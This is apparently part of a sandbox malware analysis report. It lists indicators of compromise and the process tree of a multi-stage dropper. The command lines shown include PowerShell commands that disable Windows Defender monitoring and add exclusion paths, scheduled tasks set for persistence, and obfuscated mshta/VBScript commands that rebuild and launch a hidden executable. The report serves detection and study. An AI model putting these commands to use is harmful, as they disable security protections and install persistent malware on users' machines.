WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed svchost.exe -
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ Explorer.EXE -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 2660 powershell.exe 2660 powershell.exe 2924 powershell.exe 2924 powershell.exe 3812 Tue1969586bcbf58493.exe 3812 Tue1969586bcbf58493.exe 3812 Tue1969586bcbf58493.exe 3812 Tue1969586bcbf58493.exe 3812 Tue1969586bcbf58493.exe 3812 Tue1969586bcbf58493.exe 3812 Tue1969586bcbf58493.exe 3812 Tue1969586bcbf58493.exe 3812 Tue1969586bcbf58493.exe 3812 Tue1969586bcbf58493.exe 3812 Tue1969586bcbf58493.exe 3812 Tue1969586bcbf58493.exe 3812 Tue1969586bcbf58493.exe 3812 Tue1969586bcbf58493.exe 3812 Tue1969586bcbf58493.exe 3812 Tue1969586bcbf58493.exe 3812 Tue1969586bcbf58493.exe 3812 Tue1969586bcbf58493.exe 3812 Tue1969586bcbf58493.exe 3812 Tue1969586bcbf58493.exe 3812 Tue1969586bcbf58493.exe 3812 Tue1969586bcbf58493.exe 3812 Tue1969586bcbf58493.exe 3812 Tue1969586bcbf58493.exe 3812 Tue1969586bcbf58493.exe 3812 Tue1969586bcbf58493.exe 3812 Tue1969586bcbf58493.exe 3812 Tue1969586bcbf58493.exe 3812 Tue1969586bcbf58493.exe 3812 Tue1969586bcbf58493.exe 3812 Tue1969586bcbf58493.exe 3812 Tue1969586bcbf58493.exe 3812 Tue1969586bcbf58493.exe 3812 Tue1969586bcbf58493.exe 3812 Tue1969586bcbf58493.exe 3812 Tue1969586bcbf58493.exe 3812 Tue1969586bcbf58493.exe 3812 Tue1969586bcbf58493.exe 3812 Tue1969586bcbf58493.exe 3812 Tue1969586bcbf58493.exe 3812 Tue1969586bcbf58493.exe 3812 Tue1969586bcbf58493.exe 3812 Tue1969586bcbf58493.exe 3812 Tue1969586bcbf58493.exe 3812 Tue1969586bcbf58493.exe 3812 Tue1969586bcbf58493.exe 3812 Tue1969586bcbf58493.exe 3812 Tue1969586bcbf58493.exe 3812 Tue1969586bcbf58493.exe 3812 Tue1969586bcbf58493.exe 3812 Tue1969586bcbf58493.exe 3812 Tue1969586bcbf58493.exe 3812 Tue1969586bcbf58493.exe 3812 Tue1969586bcbf58493.exe 3812 Tue1969586bcbf58493.exe 3812 Tue1969586bcbf58493.exe 3812 Tue1969586bcbf58493.exe 3812 Tue1969586bcbf58493.exe 3812 Tue1969586bcbf58493.exe 3812 Tue1969586bcbf58493.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 3220 Explorer.EXE -
Suspicious behavior: MapViewOfSection 5 IoCs
pid Process 440 bogAMCgr_ceyHDpTDqaFFCso.exe 440 bogAMCgr_ceyHDpTDqaFFCso.exe 440 bogAMCgr_ceyHDpTDqaFFCso.exe 5792 wlanext.exe 5792 wlanext.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeCreateTokenPrivilege 4648 Tue19b4ef3b53293fe.exe Token: SeAssignPrimaryTokenPrivilege 4648 Tue19b4ef3b53293fe.exe Token: SeLockMemoryPrivilege 4648 Tue19b4ef3b53293fe.exe Token: SeIncreaseQuotaPrivilege 4648 Tue19b4ef3b53293fe.exe Token: SeMachineAccountPrivilege 4648 Tue19b4ef3b53293fe.exe Token: SeTcbPrivilege 4648 Tue19b4ef3b53293fe.exe Token: SeSecurityPrivilege 4648 Tue19b4ef3b53293fe.exe Token: SeTakeOwnershipPrivilege 4648 Tue19b4ef3b53293fe.exe Token: SeLoadDriverPrivilege 4648 Tue19b4ef3b53293fe.exe Token: SeSystemProfilePrivilege 4648 Tue19b4ef3b53293fe.exe Token: SeSystemtimePrivilege 4648 Tue19b4ef3b53293fe.exe Token: SeProfSingleProcessPrivilege 4648 Tue19b4ef3b53293fe.exe Token: SeIncBasePriorityPrivilege 4648 Tue19b4ef3b53293fe.exe Token: SeCreatePagefilePrivilege 4648 Tue19b4ef3b53293fe.exe Token: SeCreatePermanentPrivilege 4648 Tue19b4ef3b53293fe.exe Token: SeBackupPrivilege 4648 Tue19b4ef3b53293fe.exe Token: SeRestorePrivilege 4648 Tue19b4ef3b53293fe.exe Token: SeShutdownPrivilege 4648 Tue19b4ef3b53293fe.exe Token: SeDebugPrivilege 4648 Tue19b4ef3b53293fe.exe Token: SeAuditPrivilege 4648 Tue19b4ef3b53293fe.exe Token: SeSystemEnvironmentPrivilege 4648 Tue19b4ef3b53293fe.exe Token: SeChangeNotifyPrivilege 4648 Tue19b4ef3b53293fe.exe Token: SeRemoteShutdownPrivilege 4648 Tue19b4ef3b53293fe.exe Token: SeUndockPrivilege 4648 Tue19b4ef3b53293fe.exe Token: SeSyncAgentPrivilege 4648 Tue19b4ef3b53293fe.exe Token: SeEnableDelegationPrivilege 4648 Tue19b4ef3b53293fe.exe Token: SeManageVolumePrivilege 4648 Tue19b4ef3b53293fe.exe Token: SeImpersonatePrivilege 4648 Tue19b4ef3b53293fe.exe Token: SeCreateGlobalPrivilege 4648 Tue19b4ef3b53293fe.exe Token: 31 4648 Tue19b4ef3b53293fe.exe Token: 32 4648 Tue19b4ef3b53293fe.exe Token: 33 4648 Tue19b4ef3b53293fe.exe Token: 34 4648 Tue19b4ef3b53293fe.exe Token: 35 4648 Tue19b4ef3b53293fe.exe Token: SeDebugPrivilege 2660 powershell.exe Token: SeDebugPrivilege 2924 powershell.exe Token: SeDebugPrivilege 3332 Tue19c78ded4d176ac.exe Token: SeDebugPrivilege 3304 Tue19411ac950924ec3f.exe Token: SeRestorePrivilege 5156 WerFault.exe Token: SeBackupPrivilege 5156 WerFault.exe Token: SeDebugPrivilege 6060 taskkill.exe Token: SeDebugPrivilege 440 bogAMCgr_ceyHDpTDqaFFCso.exe Token: SeShutdownPrivilege 3220 Explorer.EXE Token: SeCreatePagefilePrivilege 3220 Explorer.EXE Token: SeShutdownPrivilege 3220 Explorer.EXE Token: SeCreatePagefilePrivilege 3220 Explorer.EXE Token: SeShutdownPrivilege 3220 Explorer.EXE Token: SeCreatePagefilePrivilege 3220 Explorer.EXE Token: SeShutdownPrivilege 3220 Explorer.EXE Token: SeCreatePagefilePrivilege 3220 Explorer.EXE Token: SeDebugPrivilege 5740 8274515.exe Token: SeDebugPrivilege 5792 wlanext.exe Token: SeShutdownPrivilege 3220 Explorer.EXE Token: SeCreatePagefilePrivilege 3220 Explorer.EXE Token: SeDebugPrivilege 5224 taskkill.exe Token: SeShutdownPrivilege 3220 Explorer.EXE Token: SeCreatePagefilePrivilege 3220 Explorer.EXE Token: SeShutdownPrivilege 3220 Explorer.EXE Token: SeCreatePagefilePrivilege 3220 Explorer.EXE Token: SeShutdownPrivilege 3220 Explorer.EXE Token: SeCreatePagefilePrivilege 3220 Explorer.EXE Token: SeShutdownPrivilege 3220 Explorer.EXE Token: SeCreatePagefilePrivilege 3220 Explorer.EXE Token: SeShutdownPrivilege 3220 Explorer.EXE -
Suspicious use of UnmapMainImage 1 IoCs
pid Process 3220 Explorer.EXE -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1800 wrote to memory of 1344 1800 4d27dca0a1e05e876c2a1a8c09854c847b8e21bc5db294ad63cbfc603b5d62ef.exe 79 PID 1800 wrote to memory of 1344 1800 4d27dca0a1e05e876c2a1a8c09854c847b8e21bc5db294ad63cbfc603b5d62ef.exe 79 PID 1800 wrote to memory of 1344 1800 4d27dca0a1e05e876c2a1a8c09854c847b8e21bc5db294ad63cbfc603b5d62ef.exe 79 PID 1344 wrote to memory of 1952 1344 setup_installer.exe 80 PID 1344 wrote to memory of 1952 1344 setup_installer.exe 80 PID 1344 wrote to memory of 1952 1344 setup_installer.exe 80 PID 1952 wrote to memory of 4432 1952 setup_install.exe 84 PID 1952 wrote to memory of 4432 1952 setup_install.exe 84 PID 1952 wrote to memory of 4432 1952 setup_install.exe 84 PID 1952 wrote to memory of 2180 1952 setup_install.exe 85 PID 1952 wrote to memory of 2180 1952 setup_install.exe 85 PID 1952 wrote to memory of 2180 1952 setup_install.exe 85 PID 4432 wrote to memory of 2924 4432 cmd.exe 86 PID 4432 wrote to memory of 2924 4432 cmd.exe 86 PID 4432 wrote to memory of 2924 4432 cmd.exe 86 PID 2180 wrote to memory of 2660 2180 cmd.exe 87 PID 2180 wrote to memory of 2660 2180 cmd.exe 87 PID 2180 wrote to memory of 2660 2180 cmd.exe 87 PID 1952 wrote to memory of 2620 1952 setup_install.exe 88 PID 1952 wrote to memory of 2620 1952 setup_install.exe 88 PID 1952 wrote to memory of 2620 1952 setup_install.exe 88 PID 1952 wrote to memory of 4188 1952 setup_install.exe 117 PID 1952 wrote to memory of 4188 1952 setup_install.exe 117 PID 1952 wrote to memory of 4188 1952 setup_install.exe 117 PID 1952 wrote to memory of 4508 1952 setup_install.exe 89 PID 1952 wrote to memory of 4508 1952 setup_install.exe 89 PID 1952 wrote to memory of 4508 1952 setup_install.exe 89 PID 1952 wrote to memory of 3784 1952 setup_install.exe 90 PID 1952 wrote to memory of 3784 1952 setup_install.exe 90 PID 1952 wrote to memory of 3784 1952 setup_install.exe 90 PID 1952 wrote to memory of 4892 1952 setup_install.exe 91 PID 1952 wrote to memory of 4892 1952 setup_install.exe 91 PID 1952 wrote to memory of 4892 1952 setup_install.exe 91 PID 1952 wrote to memory of 3088 1952 setup_install.exe 92 PID 1952 wrote to memory of 3088 1952 setup_install.exe 92 PID 1952 wrote to memory of 3088 1952 setup_install.exe 92 PID 1952 wrote to memory of 3668 1952 setup_install.exe 101 PID 1952 wrote to memory of 3668 1952 setup_install.exe 101 PID 1952 wrote to memory of 3668 1952 setup_install.exe 101 PID 1952 wrote to memory of 3416 1952 setup_install.exe 93 PID 1952 wrote to memory of 3416 1952 setup_install.exe 93 PID 1952 wrote to memory of 3416 1952 setup_install.exe 93 PID 1952 wrote to memory of 3704 1952 setup_install.exe 100 PID 1952 wrote to memory of 3704 1952 setup_install.exe 100 PID 1952 wrote to memory of 3704 1952 setup_install.exe 100 PID 1952 wrote to memory of 4016 1952 setup_install.exe 99 PID 1952 wrote to memory of 4016 1952 setup_install.exe 99 PID 1952 wrote to memory of 4016 1952 setup_install.exe 99 PID 1952 wrote to memory of 3484 1952 setup_install.exe 98 PID 1952 wrote to memory of 3484 1952 setup_install.exe 98 PID 1952 wrote to memory of 3484 1952 setup_install.exe 98 PID 1952 wrote to memory of 5076 1952 setup_install.exe 97 PID 1952 wrote to memory of 5076 1952 setup_install.exe 97 PID 1952 wrote to memory of 5076 1952 setup_install.exe 97 PID 1952 wrote to memory of 2216 1952 setup_install.exe 96 PID 1952 wrote to memory of 2216 1952 setup_install.exe 96 PID 1952 wrote to memory of 2216 1952 setup_install.exe 96 PID 1952 wrote to memory of 1564 1952 setup_install.exe 94 PID 1952 wrote to memory of 1564 1952 setup_install.exe 94 PID 1952 wrote to memory of 1564 1952 setup_install.exe 94 PID 1952 wrote to memory of 3184 1952 setup_install.exe 95 PID 1952 wrote to memory of 3184 1952 setup_install.exe 95 PID 1952 wrote to memory of 3184 1952 setup_install.exe 95 PID 2620 wrote to memory of 5056 2620 cmd.exe 114
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Drops file in Program Files directory
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of UnmapMainImage
PID:3220 -
C:\Users\Admin\AppData\Local\Temp\4d27dca0a1e05e876c2a1a8c09854c847b8e21bc5db294ad63cbfc603b5d62ef.exe"C:\Users\Admin\AppData\Local\Temp\4d27dca0a1e05e876c2a1a8c09854c847b8e21bc5db294ad63cbfc603b5d62ef.exe"2⤵
- Suspicious use of WriteProcessMemory
PID:1800 -
C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1344 -
C:\Users\Admin\AppData\Local\Temp\7zS0450EC84\setup_install.exe"C:\Users\Admin\AppData\Local\Temp\7zS0450EC84\setup_install.exe"4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1952 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true5⤵
- Suspicious use of WriteProcessMemory
PID:4432 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2924
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"5⤵
- Suspicious use of WriteProcessMemory
PID:2180 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2660
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue19879c4c0e.exe5⤵
- Suspicious use of WriteProcessMemory
PID:2620 -
C:\Users\Admin\AppData\Local\Temp\7zS0450EC84\Tue19879c4c0e.exeTue19879c4c0e.exe6⤵
- Executes dropped EXE
PID:5056 -
C:\Users\Admin\AppData\Local\Temp\is-9T9QM.tmp\Tue19879c4c0e.tmp"C:\Users\Admin\AppData\Local\Temp\is-9T9QM.tmp\Tue19879c4c0e.tmp" /SL5="$20160,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS0450EC84\Tue19879c4c0e.exe"7⤵
- Executes dropped EXE
- Loads dropped DLL
PID:3852 -
C:\Users\Admin\AppData\Local\Temp\7zS0450EC84\Tue19879c4c0e.exe"C:\Users\Admin\AppData\Local\Temp\7zS0450EC84\Tue19879c4c0e.exe" /SILENT8⤵
- Executes dropped EXE
PID:5188 -
C:\Users\Admin\AppData\Local\Temp\is-ATMRQ.tmp\Tue19879c4c0e.tmp"C:\Users\Admin\AppData\Local\Temp\is-ATMRQ.tmp\Tue19879c4c0e.tmp" /SL5="$2021E,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS0450EC84\Tue19879c4c0e.exe" /SILENT9⤵
- Executes dropped EXE
- Loads dropped DLL
PID:5404
-
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue195c40958f528163.exe5⤵PID:4508
-
C:\Users\Admin\AppData\Local\Temp\7zS0450EC84\Tue195c40958f528163.exeTue195c40958f528163.exe6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:4948 -
C:\Users\Admin\AppData\Local\Temp\7zS0450EC84\Tue195c40958f528163.exeC:\Users\Admin\AppData\Local\Temp\7zS0450EC84\Tue195c40958f528163.exe7⤵
- Executes dropped EXE
PID:5580
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue19f51bcd77a.exe5⤵PID:3784
-
C:\Users\Admin\AppData\Local\Temp\7zS0450EC84\Tue19f51bcd77a.exeTue19f51bcd77a.exe6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:2520 -
C:\Users\Admin\AppData\Local\Temp\7zS0450EC84\Tue19f51bcd77a.exeC:\Users\Admin\AppData\Local\Temp\7zS0450EC84\Tue19f51bcd77a.exe7⤵
- Executes dropped EXE
PID:5552
-
-
C:\Users\Admin\AppData\Local\Temp\7zS0450EC84\Tue19f51bcd77a.exeC:\Users\Admin\AppData\Local\Temp\7zS0450EC84\Tue19f51bcd77a.exe7⤵
- Executes dropped EXE
PID:5832
-
-
C:\Users\Admin\AppData\Local\Temp\7zS0450EC84\Tue19f51bcd77a.exeC:\Users\Admin\AppData\Local\Temp\7zS0450EC84\Tue19f51bcd77a.exe7⤵
- Executes dropped EXE
PID:6116
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue19c06f159e0ec.exe5⤵PID:4892
-
C:\Users\Admin\AppData\Local\Temp\7zS0450EC84\Tue19c06f159e0ec.exeTue19c06f159e0ec.exe6⤵
- Executes dropped EXE
PID:4828 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4828 -s 3007⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:2264
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue1993b3f72c.exe5⤵PID:3088
-
C:\Users\Admin\AppData\Local\Temp\7zS0450EC84\Tue1993b3f72c.exeTue1993b3f72c.exe6⤵
- Executes dropped EXE
PID:4452
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue19150ee2be694c8a4.exe /mixone5⤵PID:3416
-
C:\Users\Admin\AppData\Local\Temp\7zS0450EC84\Tue19150ee2be694c8a4.exeTue19150ee2be694c8a4.exe /mixone6⤵
- Executes dropped EXE
PID:3104 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3104 -s 3007⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:416
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue19b4ef3b53293fe.exe5⤵PID:1564
-
C:\Users\Admin\AppData\Local\Temp\7zS0450EC84\Tue19b4ef3b53293fe.exeTue19b4ef3b53293fe.exe6⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4648 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4648 -s 19607⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:3236
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue1969586bcbf58493.exe5⤵PID:3184
-
C:\Users\Admin\AppData\Local\Temp\7zS0450EC84\Tue1969586bcbf58493.exeTue1969586bcbf58493.exe6⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:3812 -
C:\Users\Admin\Pictures\Adobe Films\hz2zZEE1IO8UL8KkUIl_DiwJ.exe"C:\Users\Admin\Pictures\Adobe Films\hz2zZEE1IO8UL8KkUIl_DiwJ.exe"7⤵
- Executes dropped EXE
PID:5684
-
-
C:\Users\Admin\Pictures\Adobe Films\lmuaIti549S4IlfLGjOQ62Vi.exe"C:\Users\Admin\Pictures\Adobe Films\lmuaIti549S4IlfLGjOQ62Vi.exe"7⤵
- Executes dropped EXE
PID:5232 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5232 -s 2968⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:5648
-
-
-
C:\Users\Admin\Pictures\Adobe Films\bogAMCgr_ceyHDpTDqaFFCso.exe"C:\Users\Admin\Pictures\Adobe Films\bogAMCgr_ceyHDpTDqaFFCso.exe"7⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
PID:440
-
-
C:\Users\Admin\Pictures\Adobe Films\dKb7nc_82MUnYJcIwvnENgPK.exe"C:\Users\Admin\Pictures\Adobe Films\dKb7nc_82MUnYJcIwvnENgPK.exe"7⤵
- Executes dropped EXE
- Drops file in Program Files directory
PID:5384 -
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST8⤵
- Creates scheduled task(s)
PID:4508
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST8⤵
- Creates scheduled task(s)
PID:2620
-
-
-
C:\Users\Admin\Pictures\Adobe Films\PzZpKoEf4kqLrhhG_T7hkMOE.exe"C:\Users\Admin\Pictures\Adobe Films\PzZpKoEf4kqLrhhG_T7hkMOE.exe"7⤵
- Executes dropped EXE
PID:904
-
-
C:\Users\Admin\Pictures\Adobe Films\OXLD9voH55f6gEm9L6axlvDX.exe"C:\Users\Admin\Pictures\Adobe Films\OXLD9voH55f6gEm9L6axlvDX.exe"7⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:4684
-
-
C:\Users\Admin\Pictures\Adobe Films\Xhhrp4rIfn8tBtFfUngVP_kE.exe"C:\Users\Admin\Pictures\Adobe Films\Xhhrp4rIfn8tBtFfUngVP_kE.exe"7⤵
- Executes dropped EXE
PID:3552 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3552 -s 2728⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:6028
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue19761b3b8d9d.exe5⤵PID:2216
-
C:\Users\Admin\AppData\Local\Temp\7zS0450EC84\Tue19761b3b8d9d.exeTue19761b3b8d9d.exe6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:3988 -
C:\Users\Admin\AppData\Local\Temp\7zS0450EC84\Tue19761b3b8d9d.exeC:\Users\Admin\AppData\Local\Temp\7zS0450EC84\Tue19761b3b8d9d.exe7⤵
- Executes dropped EXE
PID:5560
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue19c1338f41ab.exe5⤵PID:5076
-
C:\Users\Admin\AppData\Local\Temp\7zS0450EC84\Tue19c1338f41ab.exeTue19c1338f41ab.exe6⤵
- Executes dropped EXE
PID:4896 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4896 -s 3087⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:3448
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue19c78ded4d176ac.exe5⤵PID:3484
-
C:\Users\Admin\AppData\Local\Temp\7zS0450EC84\Tue19c78ded4d176ac.exeTue19c78ded4d176ac.exe6⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3332
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue19411ac950924ec3f.exe5⤵PID:4016
-
C:\Users\Admin\AppData\Local\Temp\7zS0450EC84\Tue19411ac950924ec3f.exeTue19411ac950924ec3f.exe6⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3304 -
C:\Users\Admin\AppData\Roaming\8274515.exe"C:\Users\Admin\AppData\Roaming\8274515.exe"7⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:5740
-
-
C:\Users\Admin\AppData\Roaming\4775154.exe"C:\Users\Admin\AppData\Roaming\4775154.exe"7⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:2052
-
-
C:\Users\Admin\AppData\Roaming\6218320.exe"C:\Users\Admin\AppData\Roaming\6218320.exe"7⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:2288
-
-
C:\Users\Admin\AppData\Roaming\7042039.exe"C:\Users\Admin\AppData\Roaming\7042039.exe"7⤵PID:5948
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbscRIpt: cLosE ( CreateOBjEct ( "WsCrIpT.shelL"). Run ( "cMD /q /c cOPy /Y ""C:\Users\Admin\AppData\Roaming\7042039.exe"" ..\RxAPuFNW.exe && sTaRT ..\rxAPuFNw.EXe -P1jBMdKQQ16j1dp4oT~i & IF """" == """" for %Z iN ( ""C:\Users\Admin\AppData\Roaming\7042039.exe"" ) do taskkill -f -Im ""%~NXZ"" ", 0, TRUE ))8⤵PID:3836
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /q /c cOPy /Y "C:\Users\Admin\AppData\Roaming\7042039.exe" ..\RxAPuFNW.exe &&sTaRT ..\rxAPuFNw.EXe -P1jBMdKQQ16j1dp4oT~i &IF "" == "" for %Z iN ( "C:\Users\Admin\AppData\Roaming\7042039.exe" ) do taskkill -f -Im "%~NXZ"9⤵PID:2644
-
C:\Windows\SysWOW64\taskkill.exetaskkill -f -Im "7042039.exe"10⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:5224
-
-
C:\Users\Admin\AppData\Local\Temp\RxAPuFNW.exe..\rxAPuFNw.EXe -P1jBMdKQQ16j1dp4oT~i10⤵
- Executes dropped EXE
PID:1540 -
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbscRIpt: cLosE ( CreateOBjEct ( "WsCrIpT.shelL"). Run ( "cMD /q /c cOPy /Y ""C:\Users\Admin\AppData\Local\Temp\RxAPuFNW.exe"" ..\RxAPuFNW.exe && sTaRT ..\rxAPuFNw.EXe -P1jBMdKQQ16j1dp4oT~i & IF ""-P1jBMdKQQ16j1dp4oT~i "" == """" for %Z iN ( ""C:\Users\Admin\AppData\Local\Temp\RxAPuFNW.exe"" ) do taskkill -f -Im ""%~NXZ"" ", 0, TRUE ))11⤵PID:2752
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /q /c cOPy /Y "C:\Users\Admin\AppData\Local\Temp\RxAPuFNW.exe" ..\RxAPuFNW.exe &&sTaRT ..\rxAPuFNw.EXe -P1jBMdKQQ16j1dp4oT~i &IF "-P1jBMdKQQ16j1dp4oT~i " == "" for %Z iN ( "C:\Users\Admin\AppData\Local\Temp\RxAPuFNW.exe" ) do taskkill -f -Im "%~NXZ"12⤵PID:4008
-
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VBSCRipT: CLOse ( createoBJECt ( "wScRIpt.shelL" ).RUn ("cMd /C EChO | SEt /p = ""MZ"" > CPkPI.i & CopY /b /Y CPkpI.I+ sQCC.RrX + NvzjY~Q7.S1K+ FZOB0ELr.D +wXR7c.DF ..\WfNrfms4.K & StARt control ..\WfNRfms4.K & Del /Q * " , 0 ,tRue ) )11⤵PID:1300
-
